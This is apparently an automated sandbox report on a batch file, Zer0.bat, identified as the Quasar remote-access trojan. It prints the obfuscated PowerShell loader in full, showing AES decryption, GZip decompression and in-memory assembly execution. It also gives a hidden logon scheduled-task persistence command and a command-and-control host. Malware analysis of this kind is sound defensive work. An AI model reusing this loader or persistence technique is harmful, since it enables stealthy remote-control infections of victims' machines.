Analysis Overview
SHA256
c8c3dd02b8fea2a4f8a1eadd7c62d79dfcb147e9766692ee6de40fb6f9cd6ae6
Threat Level: Known bad
The file Zer0.bat was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Looks up external IP address via web service
Enumerates physical storage devices
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Analysis: static1
Detonation Overview
Reported: 2024-06-08 14:02
Signatures: none listed
Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-08 14:02
Reported: 2024-06-08 14:04
Platform: win11-20240419-en
Max time kernel: 82s
Max time network: 75s
Signatures
Quasar RAT
Quasar payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Zer0.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo <PowerShell loader> " (the echoed loader is a single line in the original command line; it is reproduced below with line breaks and analyst comments, consistent with the powershell.exe -w hidden process that follows)

```powershell
# AES-CBC / PKCS7 decryption with a hard-coded 32-byte key (AES-256) and 16-byte IV.
# 'gnirtS46esaBmorF'[-1..-16] -join '' reverses the string to 'FromBase64String', so
# [System.Convert]::FromBase64String is invoked without the method name appearing literally.
function decrypt_function($param_var){
    $aes_var=[System.Security.Cryptography.Aes]::Create();
    $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
    $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
    $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zBaaBHx3j6AC8AgsWtzNY4o+cs5Hsz8D2jNBVxJlNss=');
    $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw9FJUazyFqyLpZQ1HfDnQ==');
    $decryptor_var=$aes_var.CreateDecryptor();
    $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
    $decryptor_var.Dispose();
    $aes_var.Dispose();
    $return_var;
}
# GZip-decompresses the decrypted bytes in memory.
function decompress_function($param_var){
    $OHDMP=New-Object System.IO.MemoryStream(,$param_var);
    $rDLhe=New-Object System.IO.MemoryStream;
    $cpSWI=New-Object System.IO.Compression.GZipStream($OHDMP, [IO.Compression.CompressionMode]::Decompress);
    $cpSWI.CopyTo($rDLhe);
    $cpSWI.Dispose();
    $OHDMP.Dispose();
    $rDLhe.Dispose();
    $rDLhe.ToArray();
}
# 'daoL' reversed is 'Load': the decompressed bytes are loaded as a .NET assembly through
# [System.Reflection.Assembly]::Load and its entry point is invoked inside this process,
# so no payload file ever touches disk.
function execute_function($param_var,$param2_var){
    $iuAAC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
    $TqwFC=$iuAAC.EntryPoint;
    $TqwFC.Invoke($null, $param2_var);
}
# 'txeTllAdaeR' reversed is 'ReadAllText': the script reads its own .bat file and searches
# for the line that begins with the 20-character marker 'kDFoazWuFjsDUKvTgCbr'.
$nVyiT = 'C:\Users\Admin\AppData\Local\Temp\Zer0.bat';
$host.UI.RawUI.WindowTitle = $nVyiT;
$zgURt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nVyiT).Split([Environment]::NewLine);
foreach ($wDQfL in $zgURt) {
    if ($wDQfL.StartsWith('kDFoazWuFjsDUKvTgCbr')) {
        $KlmyM=$wDQfL.Substring(20);
        break;
    }
}
# The remainder of the marker line carries two payloads separated by '\' in a modified
# base64 alphabet ('#' stands for '/', '@' stands for 'A'). Each one is decoded, decrypted,
# decompressed and executed; the second payload receives an empty string[] as its arguments.
$payloads_var=[string[]]$KlmyM.Split('\');
$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));
$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));
execute_function $payload1_var $null;
execute_function $payload2_var (,[string[]] (''));
```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_696_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ ... } " (the same loader script as the one launched from Zer0.bat above, identical apart from the self-path assignment, which now points at the persisted copy: $nVyiT = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.bat';)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| DE | 193.161.193.99:61208 | runderscore00-61208.portmap.host | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qsu4je5i.bbc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.vbs
| MD5 | b9e6132dd195db4d43770b394de14f31 |
| SHA1 | 1c5dce6b9ac1d7476ae3654386ed6032c00cde36 |
| SHA256 | 82752211d13d9e5eae1bbff22e2137b65fe0eecce172f6c5cab6060925adc308 |
| SHA512 | 07e97cc980a70df0f20ae37131e4db50428a41a50b6356ebcf035ec0942c9d878d005d8c4306ed54b1918c35b0383a5acd1ebe8c679c4610d292b2b3da0d2cc2 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.bat
| MD5 | 23e8182ee8e5dc33add24206b72fe1b2 |
| SHA1 | 744ef302e11c315fa8af3d2ba2830fdc326110ac |
| SHA256 | c8c3dd02b8fea2a4f8a1eadd7c62d79dfcb147e9766692ee6de40fb6f9cd6ae6 |
| SHA512 | 520911a8894efb73dcadf73a74a1721e852979eea54255160819e6485b40f4026216fa70f7d008c5762edc26a6a241bf216c1ef358ee97fb08a3c823a4cbb32d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3ec0d76d886b2f4b9f1e3da7ce9e2cd7 |
| SHA1 | 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea |
| SHA256 | 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5 |
| SHA512 | a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6 |